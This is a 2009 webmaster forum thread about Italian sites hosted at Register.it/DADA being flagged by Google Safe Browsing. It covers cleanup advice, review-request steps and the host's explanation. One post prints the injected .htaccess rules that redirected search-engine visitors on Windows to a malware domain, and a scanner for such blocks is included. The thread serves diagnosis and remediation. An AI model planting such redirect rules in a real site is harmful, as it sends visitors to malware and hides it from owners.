http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.italysfinest.com/
Safe Browsing
Diagnostic page for italysfinest.com
What is the current listing status for italysfinest.com?
Site is listed as suspicious – visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 5 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-12-17, and the last time suspicious content was found on this site was on 2009-12-17.
Malicious software is hosted on 2 domain(s), including antyvirusaccessory.net/, comeontraff.com/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including comeontraff.com/.
This site was hosted on 1 network(s) including AS12363 (DADA).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, italysfinest.com did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Next steps:
• Return to the previous page.
• If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google’s Webmaster Help Center.
Updated 2 hours ago
There have been a number of sites that have [antyvirusaccessory .net/, comeontraff .com/.] listed in their Google SafeBrowsing Diagnostic reports.
In troubleshooting this yesterday, another community member [redleg] had observed that most/all sites on a shared server were experiencing problems with redirects to malicious sites. In one situation, the redirects for the sites on the shared server mysteriously disappeared. I do not know, at this point, if they have started back up again.
Considering the observations made yesterday about multiple sites on a shared server having the issue, this looks like a server problem that the hosting providers are going to have to be very diligent about trying to track down.
Do any of you have visitors reporting that they are being redirected to malicious sites when they try to access your site?
Same problem here, with Register.it, from yesterday.
http://www.google.com/safebrowsing/diagnostic?site=http://www.architectour.net/
Of the 22 pages we tested on the site over the past 90 days, 9 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-12-17, and the last time suspicious content was found on this site was on 2009-12-17.
Malicious software is hosted on 5 domain(s), including antyvirusaccessory.net/, securityonlineforum.net/, comeontraff.com/.
2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including comeontraff.com/, green-power-zone.com/.
This site was hosted on 1 network(s) including AS12363 (DADA).
Same here.
Italian site.
Register.it / dada.
http://badwarebusters.org/main/itemview/13115 for details.
Now my website seems ok (but adwords not working).
Any news from register?
Does someone have news from AdWords (if anyone uses this service)?
I hope the Google AdWords team fixes my campaign soooooon.
80% less visitor in one day….
Regarding AdWords …
It is my understanding that you must contact AdWords directly, if this caused problems with your AdWords account.
AdWords Account Suspension – Malware
https://adwords.google.com/support/aw/bin/answer.py?hl=en&answer=141633
Adwords Help Forum
http://www.google.com/support/forum/p/AdWords?hl=en
In addition, if your site is labeled with “This site may harm your computer” you must go through Google Webmaster Tools to get that warning label removed.
Google Webmaster Tools
https://www.google.com/webmasters/tools/
* Add the site to Google Webmaster Tools (If you haven’t already done so)
* Verify ownership of the site (If you haven’t already done so)
* Click the site so you can see the Dashboard for that site
* Click on [ More Details ] from the red malware warning bar
* Click on “Request a Review” and complete the form
* Wait a few hours to a day or so for the warning to be removed from the search results (IF the site is clean)
* Check your messages in Google Webmaster Tools for messages related to the status of your review
This hack has been very pervasive, has hit many servers and individual sites. In most cases the hosting service has cleaned up the problem but some individual sites are still infected.
First check to see if your site remains infected. You can use a tool that shows redirects like Rex Swain at http://www.rexswain.com/httpview.html
Enter your URL and be sure to enter http://www.google.com/ in the box labeled
Referer (optional)
If your site is still infected in the results you will see the page redirected to the malicious site comeontraff.com
If your site is not redirected go ahead and submit a request for review with Google. To remove a malware warning you must “Request a Review” in the Google Webmaster Tools Account for the site. Google Webmaster Tools can be accessed at this link
https://www.google.com/webmasters/tools/
If you do not already have a WMT account for the site you can create one
Access Google WMT at the link above
Then click the Add the site to Google Webmaster Tools button
Follow the directions to Verify ownership of the site
Once you have an account and verified ownership of the site
Click the link for the site which will take you to the Dashboard for the site
Click the link [ More Details ] from the red malware warning bar
Click the link “Request a Review” and submit the requested information.
Ref
http://sites.google.com/site/webmasterhelpforum/en/faq-malware-and-hacked-sites
If your site does redirect, you need to check a file named .htaccess for suspicious redirects. To date, all of the infected sites have found the following code in their .htaccess file:
RewriteEngine On
RewriteCond %{HTTP_COOKIE} !^.*psessid=234845.*$
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.*$ [NC]
RewriteRule .* http:// comeontraff . com / go.php?sid=9 [R,L,CO=psessid:234845:%{HTTP_HOST}:86400]
In most cases the hacker has inserted 100s of blank lines after any legitimate content in the file then inserted the hack lines. Be sure that you have scrolled down to the very bottom of the file. Once you have removed the redirect you will also need to follow the instructions above to remove the malware warning.
Good Luck
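A scanner for the pattern described in the post above, as an added example (not code from the original thread): it flags directives hidden behind a long run of blank lines, RewriteCond lines keyed on search-engine referrers, and RewriteRule redirects to hosts you do not own. The sample file is constructed, `redirector.example` is a placeholder host, and the function name and the 20-blank-line threshold are assumptions.

```python
import re

# Conditions keyed on a search-engine Referer, as in the injected block above.
SEARCH_REFERER = re.compile(
    r"RewriteCond\s+%\{HTTP_REFERER\}.*(google|aol|msn|altavista|ask|yahoo)", re.I)
# RewriteRule whose target is an absolute URL; captures host and flag list.
EXTERNAL_RULE = re.compile(
    r"RewriteRule\s+\S+\s+https?://([^/\s]+)\S*\s+\[([^\]]*)\]", re.I)

def scan_htaccess(text, own_hosts=(), blank_run=20):
    """Return (line_number, reason) findings for one .htaccess file's text."""
    findings, blanks = [], 0
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            blanks += 1
            continue
        if blanks >= blank_run:  # padding used to push rules out of view
            findings.append((no, f"directive hidden after {blanks} blank lines"))
        blanks = 0
        if line.startswith("#"):
            continue
        if SEARCH_REFERER.search(line):
            findings.append((no, "condition keyed on search-engine Referer"))
        m = EXTERNAL_RULE.search(line)
        if m:
            host, flags = m.group(1).lower(), m.group(2).upper()
            if host not in own_hosts and re.search(r"(^|,)R(EDIRECT)?(=|,|$)", flags):
                findings.append((no, f"redirect to external host {host}"))
            if "CO=" in flags:
                findings.append((no, "rule sets a cookie (CO= flag)"))
    return findings

# Constructed sample: legitimate directives, 200 blank lines, then injected rules.
SAMPLE = (
    "DirectoryIndex index.php\n"
    "ErrorDocument 404 /404.html\n"
    + "\n" * 200
    + "RewriteEngine On\n"
    "RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]\n"
    "RewriteCond %{HTTP_USER_AGENT} .*Windows.*$ [NC]\n"
    "RewriteRule .* http://redirector.example/go.php?sid=9 "
    "[R,L,CO=psessid:234845:%{HTTP_HOST}:86400]\n"
)

if __name__ == "__main__":
    for line_no, reason in scan_htaccess(SAMPLE):
        print(f"line {line_no}: {reason}")
```

Pass your own site's host names in `own_hosts` so that ordinary canonical-host redirects are not reported.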
Register reply to me:
Dear customer,
We confirm that our servers are completely secure and that no server-side redirects are present. We also confirm that we have received other reports of this kind, including for sites not hosted on our servers. We are therefore trying to contact Google to verify directly with them the reason for these reports.
In any case, we recommend that you scan your system and the site's files after downloading them locally. Afterwards, you can republish them and complete the procedure indicated by Google at http://www.google.com/support/webmasters/bin/answer.py?answer=45432#3
Thank you and have a good day.
Alessandra Franconi
Support Team
--
Register.it SpA
Translation of the Register Response:
We confirm that our servers are totally safe and there are no server-side redirects. We confirm also that we have received other reports of this kind, even for sites not hosted on our servers. So we are trying to contact Google to check directly with them the reason for these reports.
We still recommend running a scan of your system and your site’s files after downloading them locally. Thereafter, you may proceed to republish and complete the steps from Google at page http://www.google.com/support/webmasters/bin/answer.py?answer=45432#3
Same mail from register.
@Redleg.
Thanks for your reply.
My .htaccess is ok, no suspicious code or other.
Date of modify is 08-25-2009, same date for most of the files (new site is up from this date).
In google wmt this morning (now seems ok) i see the malware details:
aurorasas .com/
www.aurorasas .com/
Checked yesterday many times and today with rexswain.com tools and nothing special, no redirect or other special.
I think our ISP have some problem…….
Same problem with google for many user with this in google details.
“This site was hosted on 1 network(s) including AS12363 (DADA)”
Today everything seems back to normal…
The Italian provider DADA has probably been hacked 2 days ago (as it had a down of around 10 minutes) and the support staff kept telling people that the provider was totally OK and that the culprit were the PCs of the owner of the websites have been infected… funny that the support staff didn’t even tell people to verify their DBs…
Now, I wonder if DADA/Register.it will ever tell us what really happened and if they really solved their vulnerabilities…
Shouldn’t they be legally liable for telling a lie to us and not helping us to solve a situation that they were responsible and that caused us losing tens of thousands of visitors?
Anyway my suggestions is: DO NOT USE DADA or REGISTER.IT hosting till they explain us what happened and what they have done to solve the problem!!
This is not the first time that we open a ticket for technical problems (random 500 errors when sending email thru PHP mail()) and that they keep repeating that everything is OK. After I prepared a simple php script that demonstrate the problem, everything magically started working again, without any admittance by Register.
And this isn’t a problem of Register itself, but many other italian provider do this sort of things.
And this is why I am asking customer to migrate to us/de/uk hosting providers by months (ex: slicehost/linode vps have great customer support, every ticket I opened get closed in 10 minutes 365/365).
Some good news here.
—
We have processed your request for review of your website, http://architectour.net/. At this time, none of our data partners are reporting badware activity related to the site. Any warnings displayed by our partners about your site have either already been removed or should be removed shortly. In addition, the report(s) about this site in StopBadware’s Clearinghouse have been moved from “active” to “archived.”
For tips on keeping your website clean and secure, please visit: http://stopbadware.org/home/security
If you have further questions, please visit our online help & discussion community: BadwareBusters.org.
The StopBadware Team
—
So, is this a Google false positive or someone on Register has fixed the problem without saying anything to us?
Done my request yesterday.
Reply:
We have processed your request for review of your website, http://aurorasas.com/. At this time, none of our data partners are reporting badware activity related to the site. Any warnings displayed by our partners about your site have either already been removed or should be removed shortly. In addition, the report(s) about this site in StopBadware’s Clearinghouse have been moved from “active” to “archived.”
For tips on keeping your website clean and secure, please visit: http://stopbadware.org/home/security
If you have further questions, please visit our online help & discussion community: BadwareBusters.org.
The StopBadware Team
I don’t think is a google false positive, but several issue with many website and various isp, maybe our (and other) isp solved this problem and they don’t admit any guilt or similar…
Last thing, i’ve checked my site over 100 times yesterday… i have no ideas about this situation.
I hope our isp monitoring this post and this problems.
@nico
If you want your host to monitor this conversation, you might want to provide them with a link to it.
Some providers will pick up on this type of thing because they are checking for things being posted on the internet about their services. However, if they don’t, it is always helpful if they are provided with links to discussions that their clients are having about issues with their sites that may be related to the hosting provider.
Reviews will be accomplished faster if you request them directly through Google. The process is automated, and reviews are generally completed within 24 hours (maybe even just a few hours).
If you go through StopBadware, that is a manual review process and the first thing they do is submit the site to Google for review (which you can do yourself.) They also don’t process the requests on weekends or holidays … only business days.
Instructions are at the bottom of the following post:
http://badwarebusters.org/main/itemview/13162#itemblock-13197
@filippog
You don’t want to ask for reconsideration. You want to “Request a Review.” Instructions are located toward the bottom of this post:
http://badwarebusters.org/main/itemview/13162#itemblock-13197
Other sites that were showing redirects yesterday, no longer are. So … it may be fixed. Try Requesting a Review and see what happens.
Register can say what they want, but I see many sites with many different CMS got malwared, even HTML static ones.
Additionally, I checked our entire FTP against my latest GIT revision, and anything was modified on the cms.
And no, there wasn’t any custom rules in the .htaccess, it was the first thing I checked.
Lack of transparency.
Uh, who said that?
Our isp, register.it reply:
Sorry for italian, no time for translate.
Dear Customer,
Regarding the problem you encountered, we are informing you of the outcome of the analysis and of the actions taken by our technical staff.
Some domains and some machines in our infrastructure were infected because of a vulnerability opened by an open source software package installed on our systems by some customers.
It was an htaccess exploit that was very difficult to identify, because it redirected only requests coming from the best-known search engines (Referer google, aol, altavista, msn, yahoo, ask) and made exclusively from Windows computers.
Our systems staff worked without interruption to identify and eliminate the problem, adding security patches to the system so that this does not happen again.
We used all of our contact channels with Google so that the malware warning would be removed from the Google search results pages as quickly as possible, and by the evening of Friday the 18th the warnings had already decreased sharply. The problem was completely resolved during the night between 18 and 19 December.
Thank you for your report, which, together with those of the other customers involved, was useful in identifying and resolving the problem. Do not hesitate to contact us should you encounter further problems.
Thank you for your kind cooperation.
Barbara Piarulli
Support Team
English translation of register .it email …
Dear Customer,
Regarding the problem it of the outcome of the analysis and
of speeches made by our technical staff.
Some domains of our infrastructure and some machinery were
infected because of a vulnerability ’opened by an open source software
installed on our systems by some customers.
Yes and ’treatment of an exploit htaccess very complicated to identify
As redirect requests from only the most famous engines
research (Referer Google, AOL, AltaVista, MSN, Yahoo, Ask) made
exclusively through your Windows computer.
Our staff has worked continuously to identify systems’
and eliminate the problem by adding to the system security patches
so that ’this does not happen again.
We used all our channels of contact with Google so that the
removing malware alert on results pages
Google search engine to happen as quickly as possible and already in
evening of Friday 18 reports are strongly decreased. The problem
is totally back in the night between 18 and 19 December.
Thank you for your complaint that together with that of other
customers involved was relevant to an investigation and resolution of
problem, do not hesitate to contact us should you encounter any further problems.
Thank you for your kind cooperation.



